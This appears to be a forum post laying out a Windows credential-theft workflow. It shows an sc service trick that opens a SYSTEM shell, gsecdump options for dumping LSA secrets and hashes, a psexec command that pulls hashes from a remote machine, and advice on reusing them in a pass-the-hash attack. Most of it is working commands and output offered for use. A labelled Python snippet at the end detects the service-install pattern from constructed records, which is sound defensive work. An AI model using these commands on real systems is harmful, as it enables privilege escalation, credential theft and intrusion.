To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------
Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD
Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to load the HASH information just captured with gsecdump into the local lsass process, carrying out a hash injection attack. The foreigners really are good at this; admins are going to be busy now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, actually don't need the password cracked at all; this is simply making use of the tools. As the original article puts it well, whether the password is set to 4 characters or 127, once you have the hash it's 100% done.
Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
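As an added defensive example (not code from the original post or from the tools it mentions), the following Python flags the service-install pattern shown above when run over constructed records modelled on the fields of Windows System log event 7045 ("A service was installed in the system") plus the service's Type value; the event shape and the sample records are assumptions made for illustration.

```python
import ntpath
import re

# Bits of the service Type DWORD: `sc create ... type= own type= interact`
# (as in the post) produces 0x10 | 0x100 = 0x110.
SERVICE_WIN32_OWN_PROCESS = 0x010
SERVICE_INTERACTIVE_PROCESS = 0x100

# Executables that should never be a service's own binary.
SHELL_BINARIES = {"cmd.exe", "command.com", "powershell.exe"}

# Constructed sample records (assumed shape, modelled on event 7045 fields
# plus the Type value stored under the service's registry key).
SAMPLE_EVENTS = [
    {"name": "shellcmdline", "image_path": r'"C:\WINDOWS\system32\cmd.exe /K start"',
     "type": SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS, "account": "LocalSystem"},
    {"name": "PSEXESVC", "image_path": r"%SystemRoot%\PSEXESVC.exe",
     "type": SERVICE_WIN32_OWN_PROCESS, "account": "LocalSystem"},
    {"name": "wuauserv", "image_path": r"%SystemRoot%\system32\svchost.exe -k netsvcs",
     "type": 0x20, "account": "LocalSystem"},
]


def service_binary(image_path):
    """Lowercase basename of the executable in an ImagePath, ignoring surrounding
    quotes and trailing arguments (e.g. the '/K start' in the post's binpath)."""
    m = re.match(r'\s*"?(.*?\.(?:exe|com))\b', image_path, re.IGNORECASE)
    target = m.group(1) if m else image_path.strip('" ').split(" ")[0]
    return ntpath.basename(target).lower()


def assess(event):
    """Return the reasons one installed-service record looks like a SYSTEM-shell setup."""
    reasons = []
    binary = service_binary(event["image_path"])
    if binary in SHELL_BINARIES:
        reasons.append("service binary is a command shell: " + binary)
    if event["type"] & SERVICE_INTERACTIVE_PROCESS:
        # Legacy desktop-interactive services exist, so alone this is only a hint.
        reasons.append("interactive service type (sc type= interact)")
    if binary == "psexesvc.exe" or event["name"].upper() == "PSEXESVC":
        reasons.append("PsExec service install (psexec -s runs its payload as SYSTEM)")
    return reasons


def suspicious_services(events):
    """Map service name -> reasons for every record that raised at least one."""
    return {e["name"]: assess(e) for e in events if assess(e)}
```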